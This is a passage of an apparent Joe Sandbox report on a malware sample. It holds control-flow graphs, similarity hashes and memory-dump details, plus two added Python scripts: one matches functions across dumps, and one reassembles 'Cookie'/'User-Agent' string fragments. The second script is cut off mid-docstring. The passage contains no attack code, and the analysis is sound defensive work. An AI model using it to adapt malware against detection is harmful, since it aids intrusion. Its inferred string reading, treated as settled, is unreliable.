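"""Parse Joe Sandbox 'control_flow_graph' dumps and compare functions across memory dumps.

Added example (not part of the Joe Sandbox report). The token grammar below is
inferred from the report's own graph lines (an assumption); sample lines are
copied from the report.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Dump bases from the report's "Memory Dump Source" entries.
BASE_PID36 = 0x02BB0000   # hcaresult_36_2_2bb0000_*.jbxd
BASE_PID37 = 0x02560000   # hcaresult_37_2_2560000_*.jbxd

# Graph lines copied from the report: function 1345 in both dumps, and the
# 14de (pid 36) / 14bc (pid 37) entries whose function boundaries differ.
CFG36_1345 = ("control_flow_graph 59 2bb1345-2bb1352 60 2bb13eb-2bb13ec 59->60 "
              "61 2bb1358-2bb135e 59->61 61->60 62 2bb1364-2bb137a 61->62 62->60 "
              "64 2bb137c-2bb138f 62->64 66 2bb1391-2bb1398 64->66 "
              "67 2bb139b-2bb13ab call 2bb0e7c 66->67 70 2bb13ad-2bb13e2 67->70 70->60")
CFG37_1345 = ("control_flow_graph 57 2561345-2561352 58 25613eb-25613ec 57->58 "
              "59 2561358-256135e 57->59 59->58 60 2561364-256137a 59->60 60->58 "
              "62 256137c-256138f 60->62 64 2561391-2561398 62->64 "
              "65 256139b-25613ab call 2560e7c 64->65 68 25613ad-25613e2 65->68 68->58")
CFG36_14DE = "control_flow_graph 71 2bb14de-2bb1590 call 2bb3653 call 2bb0c9c call 2bb1345 * 6"
CFG37_14BC = "control_flow_graph 38 25614bc-2561590 call 25614de call 2560c9c call 2561345 * 6"


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    calls: list[tuple[int, int]] = field(default_factory=list)  # (target, times called)


def parse_cfg(line: str) -> tuple[dict[int, Block], list[tuple[int, int]]]:
    """'<id> <addr>[-<addr>]' opens a block; 'call <addr>' and '* <n>' attach to the
    open block; '<src>-><dst>' is an edge between block ids."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: dict[int, Block] = {}
    edges: list[tuple[int, int]] = []
    current: Block | None = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            i += 1
        elif tok == "call":
            assert current is not None, "call before any block"
            current.calls.append((int(tokens[i + 1], 16), 1))
            i += 2
        elif tok == "*":
            assert current is not None and current.calls, "'*' without a preceding call"
            target, _ = current.calls.pop()
            current.calls.append((target, int(tokens[i + 1])))
            i += 2
        else:
            lo, _, hi = tokens[i + 1].partition("-")
            start = int(lo, 16)  # addresses are hex even when they look decimal (2560967)
            current = Block(int(tok), start, int(hi, 16) if hi else start)
            blocks[current.node_id] = current
            i += 2
    return blocks, edges


def fingerprint(line: str, base: int):
    """Base-relative shape of a graph: block ranges, edges and call targets as offsets
    from the dump base, with the analysis-assigned node ids removed."""
    blocks, edges = parse_cfg(line)
    start_off = {nid: b.start - base for nid, b in blocks.items()}
    ranges = sorted((b.start - base, b.end - base) for b in blocks.values())
    edge_offs = sorted((start_off[s], start_off[d]) for s, d in edges)
    calls = sorted((b.start - base, t - base, n) for b in blocks.values() for t, n in b.calls)
    return ranges, edge_offs, calls


def same_code(line_a: str, base_a: int, line_b: str, base_b: int) -> bool:
    """True when two dumps hold the same graph at the same offsets from their bases."""
    return fingerprint(line_a, base_a) == fingerprint(line_b, base_b)


if __name__ == "__main__":
    print("1345 in pid 36 == 1345 in pid 37:", same_code(CFG36_1345, BASE_PID36, CFG37_1345, BASE_PID37))
    print("14de in pid 36 == 14bc in pid 37:", same_code(CFG36_14DE, BASE_PID36, CFG37_14BC, BASE_PID37))
    for off_start, off_target, times in fingerprint(CFG36_14DE, BASE_PID36)[2]:
        print(f"  block +{off_start:x} calls +{off_target:x} x{times}")
```

Run stand-alone, the script reports True for the 1345 pair and False for the 14de/14bc pair, and lists the three call targets of the 14de block (+3653, +0c9c and +1345 six times). Because the fingerprint drops node ids and uses offsets from the dump base, it matches the report's own Opcode ID behaviour for this pair; the Instruction ID and Instruction Fuzzy Hash differ between the two dumps and are therefore not suitable for cross-dump matching of relocated code.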

Control-flow Graph

control_flow_graph 57 2561345-2561352 58 25613eb-25613ec 57->58 59 2561358-256135e 57->59 59->58 60 2561364-256137a 59->60 60->58 62 256137c-256138f 60->62 64 2561391-2561398 62->64 65 256139b-25613ab call 2560e7c 64->65 68 25613ad-25613e2 65->68 68->58
Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: e184dcd04e2ea86b70576acf487860406f5cba3fa77103c64639da8fc2e0254d
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 17218E31A04216AFDF119EB8C848B6DBBB5BF44704F098215F959BF694D770A810CB98
Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 25614de-2561590 (legend: Executed / Not Executed); rendered node and edge list omitted]

Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
• Instruction ID: 943c53926dadd7442d80c6d8bdbbf5d3efaba073ec4d46f42844c546b385634a
• Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
• Instruction Fuzzy Hash: 24116C724049159EEF03AF60C5C88BA73EDBE80704B49496A9D8AEF449FE709154CEE9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 2563f0d-2563f77 (legend: Executed / Not Executed); rendered node and edge list omitted]

Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 0348ea5431a964ddec840662d61dde98bcb2874fccb64eb886c845a2cece5c85
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: 8EF01C70588251BEFF403BB0EC4D679BAB9BF80B05F0405D1AA89AF0D4DE7885508E79
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 2564674-25647ec (legend: Executed / Not Executed); rendered node and edge list omitted]

Strings
Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: b3b6c95c62378a6dc9f68629ed08885822c061f96b203e1b1adf131367f5386b
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 614140B6500208BFEF229F65CC48BEEBFBAFF84704F154069EA44AB254D7349641CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 2564675-25647ec (legend: Executed / Not Executed); rendered node and edge list omitted]

Strings
Memory Dump Source
• Source File: 00000025.00000002.2918581585.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_37_2_2560000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 308953973f8209882fcc4503d1814855b50d52206185d47a531162b6d4981d1c
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 0A4151B6500208BFEF225F65CC48BEEBFBAFF84704F154069EA44AB254D7349651CB98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 261093e-2610af2 (legend: Executed / Not Executed); rendered node and edge list omitted]

Memory Dump Source
• Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 38e8d43403301023bd5d3553e95f552aa788bc0d451a687b25f24b8c9d599e96
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: CD5170316442549FEF229F20CC85B9A77BCAF04744F0801D9AE49FE1D6DBB0A694CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 26114bc-2611590 (legend: Executed / Not Executed); rendered node and edge list omitted]

Memory Dump Source
• Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction ID: 0ac0d93b57e53a05831a6c2011854a4ded50daf56c42613b49e552d1d7a922f8
• Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction Fuzzy Hash: F6210E724046149EDF03AF60C9C9CA673ECEF40704F4905AA9E89EF44DFA70A154CEEA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 2611345-26113ec (legend: Executed / Not Executed); rendered node and edge list omitted]

Memory Dump Source
• Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 7dd3b71c0fad22056f3125470013f62888aac05db5b7f2448e6f6f77de8bfd50
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 2F21D23190421AAFDF11DF78C844B5DBBB5AF05300F094255FE59BB694DB30E910CBA4
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 26114de-2611590 call 2613653 call 2610c9c call 2611345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction ID: 89b7a79fbf2ef458897fa56da868425e91e9e2fe2bbb59277a3a08b447d72da4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9114D724045149EEF03AF60C5C88AA73EDEF41704B4909AE9D89EF84DFE71A154CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 2613f0d-2613f29 call 2613653 call 261379f 92 2613f3b-2613f66 call 2613f78 * 3 87->92 93 2613f2b-2613f39 call 261401b 87->93 106 2613f71 92->106 101 2613f76-2613f77 93->101 106->101 107 2613f71 call 2613f78 106->107 107->101
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction ID: 3396f4c1b5be3603443aa1a33f296464a591a1c8479f1e322987a9ad3d5b9a23
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBF01270588240AEEF403F708C4965936B55F40745F0C05D5A94BAD2D5DE70A5608E79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 2614675-261468d call 2613a1c 136 261469d-26146cd 133->136 137 261468f-2614698 call 2613a6e 133->137 140 26146d3-26146f5 136->140 141 26147e7-26147ec 136->141 137->136 140->141 143 26146fb-2614720 140->143 145 2614722-2614737 143->145 146 2614738-261475a 143->146 145->146 148 261475c-261477e 146->148 149 26147bf-26147c9 146->149 148->149 155 2614780-26147a2 148->155 150 26147e0-26147e5 149->150 151 26147cb-26147dd call 2613673 149->151 150->141 151->150 155->149 157 26147a4-26147bc 155->157 157->149
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: b3cb3c4f63e0b407ba5f8b965c6d0f08294295d2a0ad10bcb294655027abf784
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: D84152B6500208BFEF129F65CC48BDEBFBAEF84704F154069EA44AB254DB34E650CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 2614674-2614680 109 261468b-261468d 108->109 110 2614686 call 2613a1c 108->110 111 261469d-26146cd 109->111 112 261468f-2614698 call 2613a6e 109->112 110->109 115 26146d3-26146f5 111->115 116 26147e7-26147ec 111->116 112->111 115->116 118 26146fb-2614720 115->118 120 2614722-2614737 118->120 121 2614738-261475a 118->121 120->121 123 261475c-261477e 121->123 124 26147bf-26147c9 121->124 123->124 130 2614780-26147a2 123->130 125 26147e0-26147e5 124->125 126 26147cb-26147dd call 2613673 124->126 125->116 126->125 130->124 132 26147a4-26147bc 130->132 132->124
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000026.00000002.2918126920.0000000002610000.00000040.00000001.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_38_2_2610000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: e2e789765ac028bd15d13fc1cf74c23254a9551c2f6fa74ec02556714d13f02a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 894153B6500208BFEF129F65CC84BDEBBBAEF84704F154059EA44AB254DB34A650CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 252093e-252095f call 2520cc4 call 25214bc call 2523cc0 8 2520967-2520989 0->8 10 2520af1-2520af2 8->10 11 252098f-25209d2 call 25209d9 8->11 15 25209d4-25209d5 11->15 16 2520a3d-2520a80 11->16 17 25209d7-25209e8 call 2523653 15->17 18 2520a3c 15->18 21 2520a82-2520aae 16->21 22 2520aec call 2520af3 16->22 17->22 29 25209ee-2520a10 17->29 18->16 21->22 27 2520ab0-2520abc 21->27 22->10 31 2520ac1-2520ae5 27->31 29->22 33 2520a16-2520a3b 29->33 31->10 37 2520ae7-2520aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 4e53e86d25cf354abe0c1fe00c78c106535cfa79f524aee6569dc90e53cb133a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: D551C2315442649FEB135F20CC84B9A7BBCBF05744F4401D9BA49FE0D6DBB09694CA69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 25214bc-2521590 call 25214de call 2520c9c call 2521345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction ID: 15480ee9d0da39b35a24e6c4ed683b1bb61b75fa03f2d717df460b533e0a2f24
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21F172404A249EDF03AF60C9C88AB73EDFF41704F45456A9989EF089FA709558CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 57 2521345-2521352 58 25213eb-25213ec 57->58 59 2521358-252135e 57->59 59->58 60 2521364-252137a 59->60 60->58 62 252137c-252138f 60->62 64 2521391-2521398 62->64 65 252139b-25213ab call 2520e7c 64->65 68 25213ad-25213e2 65->68 68->58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: c34cac81ca2a54af2047f823e6dce5caa0c4349e540f04abf438ae5ddc9a3858
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 0E21AE31904226AFEF219F78C984B9DBBB6BF05300F058215F959BB5D5D730A804CB98
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 69 25214de-2521590 call 2523653 call 2520c9c call 2521345 * 6
Memory Dump Source
• Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
• Instruction ID: 1ccee48c102eb3d13facdd217eaa8f6f091fce0379291ac89f1d510a8d4abd1b
• Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
• Instruction Fuzzy Hash: 6A11E2724049259EDF03AF20C5C8CAB73EDFE80704B45096A9D89EF489FE709158CEE9
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 87 2523f0d-2523f29 call 2523653 call 252379f 92 2523f3b-2523f66 call 2523f78 * 3 87->92 93 2523f2b-2523f39 call 252401b 87->93 106 2523f71 92->106 100 2523f76-2523f77 93->100 106->100 107 2523f71 call 2523f78 106->107 107->100
Memory Dump Source
• Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: c37496ef7cb5a9e785ec2f1acea20c84a0f064419f1817a37b47b474ee13eddf
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: 62F08230588261B6EF007B70EC496293AB97F82305F0404D0A949AD0D0DE3C85588E78
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 108 2524674-252468d call 2523a1c 111 252468f-2524698 call 2523a6e 108->111 112 252469d-25246cd 108->112 111->112 115 25246d3-25246f5 112->115 116 25247e7-25247ec 112->116 115->116 118 25246fb-2524720 115->118 120 2524722-2524737 118->120 121 2524738-252475a 118->121 120->121 123 25247bf-25247c9 121->123 124 252475c-252477e 121->124 125 25247e0-25247e5 123->125 126 25247cb-25247dd call 2523673 123->126 124->123 130 2524780-25247a2 124->130 125->116 126->125 130->123 132 25247a4-25247bc 130->132 132->123
Strings
Memory Dump Source
• Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 209acdbf8bc3812c91cd9d63d5373dbac451190f4ec2b1ac215639bafcc46be2
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 1B417FB6600218BFEF129F65CC44BEEBFBAFF81704F154069EA44AA294D7349644CF94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 133 2524675-2524680 134 252468b-252468d 133->134 135 2524686 call 2523a1c 133->135 136 252468f-2524698 call 2523a6e 134->136 137 252469d-25246cd 134->137 135->134 136->137 140 25246d3-25246f5 137->140 141 25247e7-25247ec 137->141 140->141 143 25246fb-2524720 140->143 145 2524722-2524737 143->145 146 2524738-252475a 143->146 145->146 148 25247bf-25247c9 146->148 149 252475c-252477e 146->149 150 25247e0-25247e5 148->150 151 25247cb-25247dd call 2523673 148->151 149->148 155 2524780-25247a2 149->155 150->141 151->150 155->148 157 25247a4-25247bc 155->157 157->148
Strings
Memory Dump Source
• Source File: 00000027.00000002.2921797386.0000000002520000.00000040.00000001.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2520000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 292d90d0bf46eb159d399dc0f792cda4e7ccf3e302cb50c2c6dc36f0939492fd
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: E24160B6600218BFEF125F65CC48BDEBFBAFF81704F154069EA44AA294D734D644CB98
Uniqueness
• Uniqueness Score: -1.00%
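The two functions at 2524674 and 2524675 above share the String ID -Age$Cook$User$ie: $nt:. Five fragments that each fit in four bytes is what a string comparison done one DWORD at a time looks like once the immediates are recovered: the four-byte chunks of "Cookie: " are Cook and ie: , and those of "User-Agent: " are User, -Age and nt: . The Python below is an added example, not part of the Joe Sandbox report or of the sample's code. The candidate header list is constructed for the example, and the DWORD-compare reading is an inference from the fragment shape; the report itself only lists the fragments.

```python
"""Reassemble Joe Sandbox 'String ID' fragments into HTTP header names.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Assumption: the fragments were recovered as 4-byte (DWORD) immediates, so a
header string compared one DWORD at a time shows up as 4-character chunks.
"""
from typing import Dict, List

# Fragments exactly as the report prints them in the String ID field of the
# functions at 2524674 and 2524675 (fields are '$'-separated; the report trims
# trailing whitespace, so "nt: " is shown as "nt:").
REPORT_STRING_ID = "-Age$Cook$User$ie: $nt:"

# Header names to test against. Constructed list for this example, not taken
# from the report; extend it when fragments remain unexplained.
CANDIDATE_HEADERS = [
    "Cookie: ", "User-Agent: ", "Host: ", "Referer: ", "Set-Cookie: ",
    "Content-Length: ", "Content-Type: ", "Authorization: ", "Accept: ",
]

DWORD = 4


def parse_string_id(field: str) -> List[str]:
    """Split the report's '$'-joined String ID field into fragments."""
    return [f for f in field.split("$") if f]


def dword_chunks(text: str, width: int = DWORD) -> List[str]:
    """Cut text into consecutive width-byte pieces. A trailing partial piece
    is dropped: it would have been compared with a narrower operand and so
    would not appear as a DWORD-sized fragment."""
    full = len(text) - len(text) % width
    return [text[i:i + width] for i in range(0, full, width)]


def match_headers(fragments: List[str],
                  candidates: List[str]) -> Dict[str, List[str]]:
    """Return {header: chunks} for every candidate whose DWORD chunks are all
    present among the fragments. Trailing whitespace is ignored on both sides
    so the comparison survives the report's trimming."""
    seen = {f.rstrip() for f in fragments}
    matches: Dict[str, List[str]] = {}
    for header in candidates:
        chunks = dword_chunks(header)
        if chunks and all(c.rstrip() in seen for c in chunks):
            matches[header] = chunks
    return matches


def unexplained(fragments: List[str],
                matches: Dict[str, List[str]]) -> List[str]:
    """Fragments not consumed by any matched header. A non-empty result means
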